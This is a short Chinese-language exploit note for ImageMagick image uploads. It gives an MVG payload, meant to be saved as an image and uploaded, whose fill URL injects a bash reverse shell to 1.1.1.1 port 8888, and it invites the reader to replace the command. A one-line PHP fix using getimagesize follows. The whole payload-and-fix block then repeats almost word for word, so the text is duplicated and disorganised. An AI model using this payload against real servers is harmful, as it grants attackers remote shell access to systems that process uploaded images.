利用:
如下內容保存爲圖片格式上傳即可(命令部分自行替換)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context
修復(php):
上傳時先利用getimagesize函數檢查是否爲正常圖片
利用:
如下內容保存爲圖片格式上傳即可(命令部分自行替換)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context
上傳時先利用getimagesize函數檢查是否爲正常圖片